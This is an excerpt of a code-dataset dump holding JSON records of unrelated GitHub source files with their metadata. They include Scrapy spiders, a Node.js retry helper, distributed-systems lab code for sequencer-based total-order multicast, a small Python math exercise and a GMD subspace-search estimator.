typeof(options_or_url)){\n var url = options_or_url;\n options = {};\n options.url = url;\n }\n else{\n options = options_or_url;\n }\n if (!('timeout' in options)){\n options.timeout = 3000;\n }\n function retry(depth){\n if (depth >= MAX_RETRY) return;\n var promise = new Promise(function(resolve, reject){\n request(options, function(error, response, body){\n if (error){\n if (null !== reject){\n reject(error);\n }\n console.error('error_js: '+options.url+\"\\n\"+error);\n sleep.usleep(SLEEP_MS*1000);\n return ;\n }\n if (response.statusCode == 200){\n resolve(body);\n }\n });\n });\n promise.then(end_cb, function(error) { retry(depth+1); });\n }\n retry(0);\n return ;\n};\nexports.req = req;\n"
},
{
"alpha_fraction": 0.49864864349365234,
"alphanum_fraction": 0.5013513565063477,
"avg_line_length": 27.461538314819336,
"blob_id": "0fe0f2cf35e91f6f7888b1e594acac120d1b71b3",
"content_id": "86f4d48e16397a2a03f26840f306964f6cf2dad1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 740,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 26,
"path": "/zhihu/zhihu/spiders/login.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass LoginSpider(scrapy.Spider):\n name = \"login\"\n allowed_domains = [\"zhihu.com\"]\n start_urls = [\n 'https://www.zhihu.com/login/email',\n ]\n\n def parse(self, response):\n url='https://www.zhihu.com/login/email'\n xsrf=response.xpath('//div[@class=\"view view-signin\"]//input[@name=\"_xsrf\"]/@value').extract()\n return scrapy.FormRequest(\n url=url,\n formdata={'email': '[email protected]',\n 'password':'',\n 'remember_me': 'true',\n '_xsrf': xsrf[0],\n },\n callback=self.after_login\n )\n\n def after_login(self, response):\n print response.body\n"
},
{
"alpha_fraction": 0.7162162065505981,
"alphanum_fraction": 0.7162162065505981,
"avg_line_length": 13.800000190734863,
"blob_id": "403cae8cceb931deac5e8fde050fcbab05433a94",
"content_id": "bf417cc541edfe62ea3108d35eba1990d0e92a4a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 74,
"license_type": "permissive",
"max_line_length": 26,
"num_lines": 5,
"path": "/small/xiaoying/readme.md",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "```\npip install airflow[slack]\nairflow initdb\nairflow scheduler -sd .\n```\n"
},
{
"alpha_fraction": 0.6407982110977173,
"alphanum_fraction": 0.6430155038833618,
"avg_line_length": 21.5,
"blob_id": "2cc355e7e706cb775134dace3302ed0dffc5067d",
"content_id": "a3ebd91e8a34ff7e259fd39969a562d733dbd51b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 451,
"license_type": "permissive",
"max_line_length": 51,
"num_lines": 20,
"path": "/caoporn/caoporn/items.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\n\n\nclass VideoItem(scrapy.Item):\n name = scrapy.Field()\n url = scrapy.Field()\n hash = scrapy.Field()\n cover = scrapy.Field()\n length = scrapy.Field()\n views = scrapy.Field()\n is_hd = scrapy.Field()\n is_private = scrapy.Field()\n _create_time = scrapy.Field()\n\n"
}
] | 43 |
YASHAMWAN/Data-Preprocessing
|
https://github.com/YASHAMWAN/Data-Preprocessing
|
93d758d983dcc62a1e004fe9a1ace31e5581c0b4
|
36d695c5165b0447655bdfd455f694cb6b02c6b1
|
309e707dc9259c7a4d5688d6912a126f86ed5c6f
|
refs/heads/master
| 2020-05-27T12:42:34.109154 | 2019-05-26T00:00:50 | 2019-05-26T00:00:50 | 188,622,805 | 0 | 0 | null | 2019-05-25T23:54:30 | 2019-05-26T00:00:52 | 2019-05-26T00:02:54 |
Python
|
[
{
"alpha_fraction": 0.7333333492279053,
"alphanum_fraction": 0.7463768124580383,
"avg_line_length": 24.55555534362793,
"blob_id": "42d9c35587f77de7bac044b08bcda1b7c47d8dbd",
"content_id": "9b3fddb0531e83df687457434a92d99ac435e805",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 690,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 27,
"path": "/encoding.py",
"repo_name": "YASHAMWAN/Data-Preprocessing",
"src_encoding": "UTF-8",
"text": "#data preprocessing\n\n#import libraries\nimport numpy as np\nimport matplotlib as plt\nimport pandas as pd\n\n# get current working directory\nimport os\nprint(os.getcwd())\n\n#set current working directory'\nos.chdir('C:/Users/ThinkPad/Desktop/Machine Learning A-Z/Part 1 - Data Preprocessing/Data_Preprocessing')\n#import dataset\ndataset = pd.read_csv('Data.csv')\nprint(dataset)\n\nX = dataset.iloc[ :, :-1].values\ny = dataset.iloc[:, 3].values\nprint(X)\n#taking care of missing data using Univariate feature imputation\nfrom sklearn.impute import SimpleImputer\nimputer = SimpleImputer(missing_values = np.nan, strategy = 'mean')\nimputer.fit(X[:, 1:3])\nX[:, 1:3] = imputer.transform(X[: ,1:3])\n\nprint(X)\n"
}
] | 1 |
doogrammargood/distributed_systems_lab2
|
https://github.com/doogrammargood/distributed_systems_lab2
|
bc43ba7fa2162ea2cab1ce15ec4eed63434cc5f4
|
a175cf0103fab3d08e6ee4e875dc95895151173d
|
3de09badf7b05446ecf1a8b42134985b8fb28c9b
|
refs/heads/master
| 2020-05-05T00:40:22.397339 | 2019-04-09T07:22:59 | 2019-04-09T07:22:59 | 179,582,559 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6602683663368225,
"alphanum_fraction": 0.6718226075172424,
"avg_line_length": 35.75342559814453,
"blob_id": "fa156591e8da0e42ac44da36c48f853c459b6300",
"content_id": "41037f170ce73a4ac2a37ea219b760db86d1fabd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5366,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 146,
"path": "/processes.py",
"repo_name": "doogrammargood/distributed_systems_lab2",
"src_encoding": "UTF-8",
"text": "import sys\nimport socket\nimport threading\nimport pickle\nfrom termcolor import colored\nimport random\nimport time\n\n#def __main__():\n#print sys.argv\ntest_behavior = 2\n#test behavior 0 accepts messages from the command line.\n# '''''''''''''1 sends a message to the next process.\n\nprocess_id = int(sys.argv[1]) #proccess id is set by command line.\n#sequencer_address = sys.argv[2] #the address of the sequencer.\nsequencer_address =('', int(sys.argv[2]))\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.bind(('',12000+process_id))\n\ncolors = {1: 'red', 2: 'green', 3: 'blue', 4: 'magenta'} #used to pretty print messages which have been delivered\n\nclock = 0 #This is the number of messages which have been sent\nexpected_sequence_number = 1\nhold_back_list = []\n\ndelivered_messages = [] #a list of messages which have been delivered\ndef wrap_message(message):\n global clock\n dict = {\"sender_id\": process_id, \"message_contents\": message, \"local_clock\": clock}#, \"seq_num\": 1}\n return pickle.dumps(dict)\n\nlock = threading.Lock()\ndef send_message(message):\n global clock\n lock.acquire()\n try:\n sock.sendto(wrap_message(message), sequencer_address)\n clock = clock+1\n finally:\n lock.release()\n\ndef deliver_message(message):\n # print \"You've got mail!\"\n # print message\n delivered_messages.append(message)\n global expected_sequence_number\n expected_sequence_number +=1\n if test_behavior == 1:\n if int(message['message_contents'][0]) == process_id:\n next_process = (process_id +1)%4\n if next_process == 0:\n next_process = 4\n send_message(\"%d please forward this message\" %next_process)\n\ndef pretty_print_messages(queue):\n #prints the messages in delivered messages\n for message in queue:\n text = colored(message[\"message_contents\"], colors[message[\"sender_id\"]])\n print text\n\ncascade_lock = threading.Lock()\n\ndef cascade_deliveries():\n cascade_lock.acquire()\n try:\n global hold_back_list\n global expected_sequence_number\n hold_back_list = sorted(hold_back_list, key = lambda x: x[\"seq_num\"])\n #well sort the messages, then check that\n for message in hold_back_list:\n if expected_sequence_number == message[\"seq_num\"]:\n deliver_message(message)\n #hold_back_list.remove(message)\n hold_back_list = filter(lambda message: message[\"seq_num\"]>expected_sequence_number,hold_back_list)\n finally:\n cascade_lock.release()\n return\n\ndef receive_message(message_from_seq):\n delay=random.random()*5\n time.sleep(delay) #stimulate delay\n global expected_sequence_number\n global delivered_messages\n global hold_back_list\n print \"recieved message\", message_from_seq\n print expected_sequence_number\n if message_from_seq[\"seq_num\"] == expected_sequence_number:\n deliver_message(message_from_seq)\n cascade_deliveries()\n elif not message_from_seq[\"seq_num\"] in map(lambda x: x[\"seq_num\"],hold_back_list):\n #as long as this isnt a duplicate\n cascade_lock.acquire()\n try:\n hold_back_list.append(message_from_seq)\n finally:\n cascade_lock.release()\ndef listen_for_message():\n #listens for messages from keyboard, only for test_behavior = 0\n global clock\n while True:\n message = input()\n send_message(message)\ndef send_messages_randomly():\n #This method is specifically for test 2\n global clock\n global test2_ongoing\n while test2_ongoing:\n delay=random.random()\n time.sleep(delay)\n send_message(\"%d\" %clock)\n\nif test_behavior ==0:\n #This is the default behavior, where the user inputs a message to send to the other processes.\n input_thread = threading.Thread(target = listen_for_message)\n input_thread.start()\n while True:\n message, address = sock.recvfrom(1024)\n receive_thread = threading.Thread(target = receive_message, args = (pickle.loads(message),))\n receive_thread.start()\n #receive_message(pickle.loads(message))\nelif test_behavior == 1:\n #This is the test behavior, where process 1 sends a message containing '2',\n #process 2 sends a message containing '3', and so forth cyclically.\n #Then we check after 10 messages that the delivered messages follow the desired order.\n if process_id == 1:\n send_message(\"2 please forward this message.\")\n while len(delivered_messages)<10:\n message, address = sock.recvfrom(1024)\n receive_thread = threading.Thread(target = receive_message, args = (pickle.loads(message),))\n receive_thread.start()\n pretty_print_messages(delivered_messages)\nelif test_behavior == 2:\n #In this test behavior, each process will continually send messages.\n time.sleep(15) #so that there's enough time to start all of the processes before any send messages.\n print \"starting\"\n test2_ongoing = True\n sending_thread = threading.Thread(target = send_messages_randomly)\n sending_thread.start()\n while len(delivered_messages)<10:\n message, address = sock.recvfrom(1024)\n receive_thread = threading.Thread(target = receive_message, args = (pickle.loads(message),))\n receive_thread.start()\n test2_ongoing = False\n\n pretty_print_messages(delivered_messages)\n"
},
{
"alpha_fraction": 0.5920939445495605,
"alphanum_fraction": 0.6064165234565735,
"avg_line_length": 33.22549057006836,
"blob_id": "588bf33cb18668e185eb6180b1314becc9017b32",
"content_id": "710711cefaf805b6f26235cdeca5fdbb379be7a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3491,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 102,
"path": "/sequencer.py",
"repo_name": "doogrammargood/distributed_systems_lab2",
"src_encoding": "UTF-8",
"text": "import sys\nimport socket\nimport threading\n#import thread\nimport pickle\nimport os\nimport random\nimport time\n\nVclock={1:0,2:0,3:0,4:0}\nsequence=0\nhold_back_list = []\n\nADDRESS=('localhost',8080)\ng_conn_pool=[]\nserver = None\nserver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nserver.bind(ADDRESS)\n\nclient_address1 =('', int(sys.argv[1]))\nclient_address2 =('', int(sys.argv[2]))\nclient_address3 =('', int(sys.argv[3]))\nclient_address4 =('', int(sys.argv[4]))\nclient={1:client_address1,2:client_address2,3:client_address3,4:client_address4}\n\n\nprint(\"Sequenser start running\")\n\ndef wrap_message(message,seq_num,sender_id):\n dict = {\"message_contents\": message, \"seq_num\": seq_num,\"sender_id\": sender_id}\n return pickle.dumps(dict)\n\ndef send_message(message,seq_num,sender_id):\n #server.sendall(wrap_message(message,seq_num)\n for n in client:\n server.sendto(wrap_message(message,seq_num,sender_id), client[n])\n\n\ndef client_number(address):\n #returns the client number from a given address.\n #print address\n return [index for index in range(1,5) if client[index][1]==address[1]][0]\n\ndef receive_message(message_from_client, address):\n thread = threading.Thread(target = run, args=(message_from_client,))\n #add address when receving instead of initializion\n # if address not in client:\n # client.add(address)\n thread.start()\n\nlock = threading.Lock()\n\ndef run(message_from_client):\n global Vclock\n global sequence\n global hold_back_list\n delay=random.random()*5\n time.sleep(delay) #stimulate delay\n print(\"receive message from id:%d,with LC:%d at %f\"%(message_from_client[\"sender_id\"],message_from_client[\"local_clock\"],time.time())) #for check purpose\n print message_from_client[\"local_clock\"]\n print Vclock[message_from_client[\"sender_id\"]]\n if message_from_client[\"local_clock\"] == Vclock[message_from_client[\"sender_id\"]]:\n print \"in if statement\"\n print sequence\n lock.acquire()\n try:\n sequence+=1\n Vclock[message_from_client[\"sender_id\"]]+=1\n send_message(message_from_client[\"message_contents\"],sequence,+message_from_client[\"sender_id\"])\n check=-1\n while (check < 0):\n check+=1\n for n in hold_back_list:\n check+=1\n if (message_from_client[\"sender_id\"] == n[\"sender_id\"]):\n if(Vclock[message_from_client[\"sender_id\"]] == n[\"local_clock\"]):\n send_message(n[\"message_contents\"],sequence+1,n[\"sender_id\"])\n print(\"send message:%s with sequence:%d,sender_id:%d localclock:%d\"%(n[\"message_contents\"],sequence+1,n[\"sender_id\"],n[\"local_clock\"]))\n Vclock[message_from_client[\"sender_id\"]]+=1\n sequence+=1\n check-=1\n check-=len(hold_back_list)\n hold_back_list.remove(n)\n finally:\n lock.release()\n\n else:\n print \"hold back list appended\"\n print Vclock\n lock.acquire()\n try:\n hold_back_list.append(message_from_client)\n finally:\n lock.release()\n print hold_back_list\n\nif __name__ == '__main__':\n while True:\n message,address = server.recvfrom(1024)\n receive_message(pickle.loads(message), address)\n print \"got a message from\"\n print address\n"
}
] | 2 |
Dey-Sumit/Tababble_api
|
https://github.com/Dey-Sumit/Tababble_api
|
34d4c179bf1342c313eea3294c88e100c15110af
|
74654cf26bf5034f3a81259e7d24767b52da210b
|
13a5606e4d7440e91e9140f3d090bcba0c698e3c
|
refs/heads/master
| 2022-12-09T22:32:42.275914 | 2020-09-06T15:01:54 | 2020-09-06T15:01:54 | 293,299,644 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7388441562652588,
"alphanum_fraction": 0.7446964383125305,
"avg_line_length": 25.288461685180664,
"blob_id": "ea1aed53c1842659b3b62eb7411cef7e7ed8e78d",
"content_id": "509c1a10d17811909952a31a12567c614dc937cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1367,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 52,
"path": "/README.md",
"repo_name": "Dey-Sumit/Tababble_api",
"src_encoding": "UTF-8",
"text": "# Tababble API using python\n\nExtract all the focusable elements (web element that can be selected using tab) from a web page maintaining the order using python and selenium\n\n\n\n### Prerequisites\n\npython packages you need to install :\n\n```\nselenium (version:3 or higher)\n```\nBrowser Driver (eg: Chrome web driver)\n\n\n## Set up\n\n1. Download the tab.py file or clone the repo\n2. change the webdriver location if needed\n```\ndriver = webdriver.Chrome(executable_path=r\"C:\\Users\\Sumax\\Desktop\\Selenium\\chromedriver.exe\")\n``` \n3. That's all , run the tab.py file\n\n## Running the test\nWhen you run the file,\n1. This program first asks for the URL(user input) for which you want to extract the elements\n2. Then it checks the validation of the URL using regex\n3. If it passed , it extracts all the focusable elements and store it as an object with details in a global list of objects\n4. You can then create an excel sheet using the array of objects\n\n\n## Built With\n\n* [Selenium](https://pypi.org/project/selenium/) - The selenium package is used to automate web browser interaction from Python.\n\n\n## Contributing\n\nPlease read [CONTRIBUTING.md]() for details on our code of conduct, and the process for submitting pull requests to us.\n\n## Author\n\n* **Sumit Dey** - [Dey-Sumit](https://github.com/Dey-Sumit/)\n\n\n\n## License\n\nThis project is free to use,\nfeel free to fork the project\n"
},
{
"alpha_fraction": 0.6015157103538513,
"alphanum_fraction": 0.6060383915901184,
"avg_line_length": 27.590909957885742,
"blob_id": "3a24bcc4fe5f3c6f0935b627210a52154ffa37d7",
"content_id": "0518b96a7a2f251d06051734285b8b2b5e058ade",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8181,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 286,
"path": "/tab.py",
"repo_name": "Dey-Sumit/Tababble_api",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nimport re\n# regular expression to check the validation of url\n'''\nhttps://google.com -> valid\nhttps://google.com/abc -> valid\ngoogle.com -> not valid\netc..\n'''\nregex = re.compile(\n r'^(?:http|ftp)s?://' # http:// or https://\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' #domain...\n r'localhost|' #localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' # optional port\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE) \n\n# global variables\n# URl : stores the use given url\n# window handle : stored the current selenium controlled browser tab\n\ndriver,URL,window_handles = None,None,None\n\n#fetch the focusable elements in sequence\ndef fetch_current_page():\n global window_handles\n window_handles = driver.window_handles\n # switch to the latest opened window\n driver.switch_to.window(window_handles[len(window_handles)-1])\n \n # get the current page title\n #title = driver.execute_script(\"return document.title\")\n page_title = driver.title\n print(\"Page title: \",page_title)\n\n # -- java-script\n # get all the focusable elements which are visible in DOM in sequence\n elements = driver.execute_script(\"\"\"\n \nlet candidateSelectors = [\n 'input',\n 'select',\n 'textarea',\n 'a[href]',\n 'button',\n '[tabindex]',\n 'audio[controls]',\n 'video[controls]',\n '[contenteditable]:not([contenteditable=\"false\"])',\n];\nlet candidateSelector = candidateSelectors.join(',');\n\nlet matches =\n typeof Element === 'undefined'\n ? function () { }\n : Element.prototype.matches ||\n Element.prototype.msMatchesSelector ||\n Element.prototype.webkitMatchesSelector;\n\nfunction tabbable(el, options) {\n options = options || {};\n\n let regularTabbables = [];\n let orderedTabbables = [];\n\n let candidates = el.querySelectorAll(candidateSelector);\n\n if (options.includeContainer) {\n if (matches.call(el, candidateSelector)) {\n candidates = Array.prototype.slice.apply(candidates);\n candidates.unshift(el);\n }\n }\n\n let candidate;\n let candidateTabindex;\n for (let i = 0; i < candidates.length; i++) {\n candidate = candidates[i];\n\n if (!isNodeMatchingSelectorTabbable(candidate)) {\n continue;\n }\n\n candidateTabindex = getTabindex(candidate);\n if (candidateTabindex === 0) {\n regularTabbables.push(candidate);\n } else {\n orderedTabbables.push({\n documentOrder: i,\n tabIndex: candidateTabindex,\n node: candidate,\n });\n }\n }\n\n let tabbableNodes = orderedTabbables\n .sort(sortOrderedTabbables)\n .map(a => a.node)\n .concat(regularTabbables);\n\n return tabbableNodes;\n}\n\ntabbable.isTabbable = isTabbable;\ntabbable.isFocusable = isFocusable;\n\nfunction isNodeMatchingSelectorTabbable(node) {\n if (\n !isNodeMatchingSelectorFocusable(node) ||\n isNonTabbableRadio(node) ||\n getTabindex(node) < 0\n ) {\n return false;\n }\n return true;\n}\n\nfunction isTabbable(node) {\n if (!node) {\n throw new Error('No node provided');\n }\n if (matches.call(node, candidateSelector) === false) {\n return false;\n }\n return isNodeMatchingSelectorTabbable(node);\n}\n\nfunction isNodeMatchingSelectorFocusable(node) {\n if (node.disabled || isHiddenInput(node) || isHidden(node)) {\n return false;\n }\n return true;\n}\n\nlet focusableCandidateSelector = candidateSelectors.concat('iframe').join(',');\nfunction isFocusable(node) {\n if (!node) {\n throw new Error('No node provided');\n }\n if (matches.call(node, focusableCandidateSelector) === false) {\n return false;\n }\n return isNodeMatchingSelectorFocusable(node);\n}\n\nfunction getTabindex(node) {\n let tabindexAttr = parseInt(node.getAttribute('tabindex'), 10);\n if (!isNaN(tabindexAttr)) {\n return tabindexAttr;\n }\n // Browsers do not return `tabIndex` correctly for contentEditable nodes;\n // so if they don't have a tabindex attribute specifically set, assume it's 0.\n if (isContentEditable(node)) {\n return 0;\n }\n return node.tabIndex;\n}\n\nfunction sortOrderedTabbables(a, b) {\n return a.tabIndex === b.tabIndex\n ? a.documentOrder - b.documentOrder\n : a.tabIndex - b.tabIndex;\n}\n\nfunction isContentEditable(node) {\n return node.contentEditable === 'true';\n}\n\nfunction isInput(node) {\n return node.tagName === 'INPUT';\n}\n\nfunction isHiddenInput(node) {\n return isInput(node) && node.type === 'hidden';\n}\n\nfunction isRadio(node) {\n return isInput(node) && node.type === 'radio';\n}\n\nfunction isNonTabbableRadio(node) {\n return isRadio(node) && !isTabbableRadio(node);\n}\n\nfunction getCheckedRadio(nodes) {\n for (let i = 0; i < nodes.length; i++) {\n if (nodes[i].checked) {\n return nodes[i];\n }\n }\n}\n\nfunction isTabbableRadio(node) {\n if (!node.name) {\n return true;\n }\n // This won't account for the edge case where you have radio groups with the same\n // in separate forms on the same page.\n let radioSet = node.ownerDocument.querySelectorAll(\n 'input[type=\"radio\"][name=\"' + node.name + '\"]'\n );\n let checked = getCheckedRadio(radioSet);\n return !checked || checked === node;\n}\n\nfunction isHidden(node) {\n // offsetParent being null will allow detecting cases where an element is invisible or inside an invisible element,\n // as long as the element does not use position: fixed. For them, their visibility has to be checked directly as well.\n return (\n node.offsetParent === null || getComputedStyle(node).visibility === 'hidden'\n );\n}\n\nparent = document.body\nconst arr = tabbable(parent)\nreturn arr\n \"\"\")\n\n # traverse the array and print in formatted way\n total = len(elements)\n print(\"total elements \",total)\n data = [] # final array of objects\n\n for el in range(total):\n # create object for each element\n d = {\n# 'page_name':page_title,\n# 'id':elements[el].id\n }\n name = elements[el].get_attribute(\"name\")\n text = elements[el].text\n title = elements[el].get_attribute(\"title\")\n value = elements[el].get_attribute(\"value\")\n label = elements[el].get_attribute(\"aria-label\")\n outerHTML = elements[el].get_attribute(\"outerHTML\")\n \n if name:d['element'] = name\n elif text:d['element'] = text\n elif title:d['element'] = title\n elif value:d['element'] = value\n elif label: d['element'] =label\n else:\n d['element'] = \"NA\" # if no valid identifier found; \n d['HTML_tag'] = outerHTML\n print(d)\n # push it to the final array of objects\n data.append(d)\n \n# program starts here\nif __name__ == '__main__':\n isValidURL = False\n # check given url is valid or not\n while not isValidURL:\n URL = input(\" Enter the url: ex: https://www.example.com \")\n # url validation\n isValidURL = re.match(regex, URL)\n if not isValidURL:\n print(\"URL is not valid\")\n\n # if url is valid , go forward \n print(\"connecting...\")\n \n # driver set up \n driver = webdriver.Chrome(executable_path=r\"C:\\Users\\Sumax\\Desktop\\Selenium\\chromedriver.exe\")\n driver.maximize_window()\n driver.get(URL)\n print(\"connected; Browse the page...\") # connection established\n\n while True:\n print(\"1 : to fetch the current page data\")\n print(\"2 : to generate the log file in XLS format\")\n print(\"3 : to quit\")\n choice = int(input(\"Enter your choice\"))\n if choice == 1:\n fetch_current_page()\n if choice == 2:\n print(\"Not implemented in server side\")\n pass\n # use data list to generate XLS file\n #generate_log_file()\n if choice == 3:\n print(\"driver session killed ...\")\n driver.quit()\n break\n else:\n print(\"Enter valid input\") \n\n"
}
] | 2 |
Aaron09/LiveDataLab-PBLP-ExampleProject
|
https://github.com/Aaron09/LiveDataLab-PBLP-ExampleProject
|
632cb0510c32bf787ab49cb5eabd7c3e06d4c007
|
52cfce90a9186b4fe0c28f48fb181a6adb1073cf
|
ce517a233c177a3c2c387ac7115f5241400bbd77
|
refs/heads/master
| 2020-12-05T00:06:58.927715 | 2020-01-26T03:30:11 | 2020-01-26T03:30:11 | 231,945,418 | 2 | 0 | null | 2020-01-05T16:30:46 | 2020-01-05T16:28:37 | 2020-01-05T16:28:04 | null |
[
{
"alpha_fraction": 0.7675940990447998,
"alphanum_fraction": 0.7675940990447998,
"avg_line_length": 100.83333587646484,
"blob_id": "e88755ea95524627e0d19d6f6c1c352e2fe1435e",
"content_id": "1c5f84c8c8e739444c7e24ec946b974292747a31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1222,
"license_type": "no_license",
"max_line_length": 318,
"num_lines": 12,
"path": "/README.md",
"repo_name": "Aaron09/LiveDataLab-PBLP-ExampleProject",
"src_encoding": "UTF-8",
"text": "# Example Project\nThis is an example project for the LiveDataLab Project-Based Learning Platform.\n\n### Setting up the project\nTo work on this project, you should first link your Github account within the LiveDataLab dashboard [TODO: Add link to website here]. This allows you to leverage the submission infrastructure where we execute your code in the cloud.\n\nAfter linking your Github account, you should fork this repository to create your own version. Next, in that forked repo, go to `settings` -> `webhooks` -> `Add webhook`. Enter `ADD LINK HERE` into the payload url, and select `application/json` as the `Content type`. Then click the `Add webhook` button at the bottom.\n\nYou're all set up and ready to go! You can now clone your forked repo to your computer and begin working. When you're ready to make a submission, all you need to do is push to your fork. After doing so, you can navigate back to the LiveDataLab dashboard to see the results.\n\n### Project Specifics\nThis project contains two source files: `main.py` and `mymath.py`. `main.py` is wrapper code for testing the functions within `mymath.py`. Your goal is to implement the four functions in `mymath.py`: `add`, `subtract`, `multiply`, and `divide`.\n"
},
{
"alpha_fraction": 0.5080214142799377,
"alphanum_fraction": 0.5721924901008606,
"avg_line_length": 25.714284896850586,
"blob_id": "c6aad1142f9b2f93701d6e9808e9f21e078ea365",
"content_id": "04af3cc47dfedc835b498476f01d296566b12298",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 187,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 7,
"path": "/main.py",
"repo_name": "Aaron09/LiveDataLab-PBLP-ExampleProject",
"src_encoding": "UTF-8",
"text": "import mymath\n\nif __name__ == \"__main__\":\n assert mymath.add(1, 2) == 3\n assert mymath.subtract(2, 1) == 1\n assert mymath.multiply(2, 3) == 6\n assert mymath.divide(4, 2) == 2\n"
}
] | 2 |
andersonvaf/gmd
|
https://github.com/andersonvaf/gmd
|
ad7f46f6367fca0fbcc00663af46fdc64c10d3d4
|
5535e971d22b177267636aff495299fc29122bfc
|
9daf66a76e4a06248fadfe28e58885da2811f0b1
|
refs/heads/master
| 2020-06-15T02:53:41.533178 | 2019-06-10T13:31:54 | 2019-06-10T13:31:54 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5546653866767883,
"alphanum_fraction": 0.5605560541152954,
"avg_line_length": 31.39694595336914,
"blob_id": "84c75ae3731342fd980725517651d49ec00f23a0",
"content_id": "8cd7ae1868b7df609b707b194824e66c0f1cc93f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4244,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 131,
"path": "/gmd/gmd.py",
"repo_name": "andersonvaf/gmd",
"src_encoding": "UTF-8",
"text": "\"\"\"\nThis is the scikit-learn compatible gmd module\n\"\"\"\nimport numpy as np\nfrom sklearn.base import BaseEstimator\nfrom sklearn.utils import check_random_state\nfrom sklearn.utils.validation import check_array, check_is_fitted\nfrom libgmdc import avg_deviation\nfrom libgmdc import set_seed\n\n\nclass GMD(BaseEstimator):\n \"\"\"GMD Estimator. Used to compute interesting subspaces in a dataset.\n \"\"\"\n\n def __init__(self, alpha=0.1, runs=100, random_state=None):\n \"\"\"Constructor for the GMD class\n\n Parameters\n ----------\n alpha :: float, default=0.1\n Determines the slice slice.\n runs :: int, default=100\n Number of Monte Carlo iterations\n random_state :: int, default=None\n Used to seed the C PRNG\n \"\"\"\n self.alpha = alpha\n self.runs = runs\n self.random_state = random_state\n\n def fit(self, X, y=None):\n \"\"\"Compute the interesting subspaces. The result can be found in `subspaces_`.\n\n Parameters\n ----------\n X :: {array-like, sparse matrix}, shape (n_samples, n_features)\n The training input samples.\n y :: default=None,\n Not used in the unsupervised setting.\n\n Returns\n -------\n self :: object\n Returns self.\n \"\"\"\n self._deviations = None\n self.is_fitted_ = False\n self.subspaces_ = {}\n self._sorted = None\n set_seed(self.random_state)\n\n X = check_array(X, ensure_min_samples=2)\n\n self._sorted = self.create_sorted_index(X)\n\n self.subspaces_, self.contrasts_ = self._interesting_subspaces()\n\n self.is_fitted_ = True\n return self\n\n def create_sorted_index(self, X):\n res = np.empty_like(X, dtype=np.int32)\n self._sorted = np.concatenate([X, np.array([range(0, len(X))]).T], axis=1)\n for i in range(X.shape[1]):\n self._sorted = self._sorted[self._sorted[:, i].argsort(kind=\"mergesort\")]\n res[:, i] = self._sorted[:, -1]\n return res.astype(np.int32)\n\n def _avg_deviation(self, subspaces, reference_dim):\n \"\"\"\n Compute the deviation in a subspace given the reference dimension.\n\n Parameters\n ----------\n subspaces : orthogonal projections defining the constraints of the hypercube\n reference_dim : the unconstrained projection\n\n Returns\n -------\n float with the deviation of the subspaces wrt. the reference_dim\n \"\"\"\n return avg_deviation(\n self._sorted,\n np.array(subspaces, dtype=np.int32),\n reference_dim,\n self.alpha,\n self.runs,\n )\n\n def _deviation_matrix(self):\n \"\"\"\n Compute the deviation of each pair of dimensions. Runs lazily.\n\n Returns\n -------\n 2-D array m x m, m being the count of attributes\n \"\"\"\n if self._deviations is None:\n cols = self._sorted.shape[1]\n out = np.zeros((cols, cols))\n for i in range(cols):\n for j in range(cols): # TODO: use symmetry\n if i != j:\n res = self._avg_deviation([i, j], i)\n out[i, j] = res\n self._deviations = out\n return self._deviations\n\n def _max_deviation_subspaces(self, reference_dimension):\n subspaces = []\n deviations = self._deviation_matrix() # TODO: only use vector here\n sorted_indices = np.argsort(deviations[reference_dimension]) # highest is last\n current_max = -1\n subspaces.append(reference_dimension)\n for i in reversed(sorted_indices):\n if i != reference_dimension:\n subspaces.append(i)\n tmp = self._avg_deviation(subspaces, reference_dimension)\n if tmp < current_max:\n subspaces.pop()\n else:\n current_max = tmp\n return subspaces, current_max\n\n def _interesting_subspaces(self):\n res = {}\n contrasts = {}\n for i in range(self._sorted.shape[1]):\n res[i], contrasts[i] = self._max_deviation_subspaces(i)\n 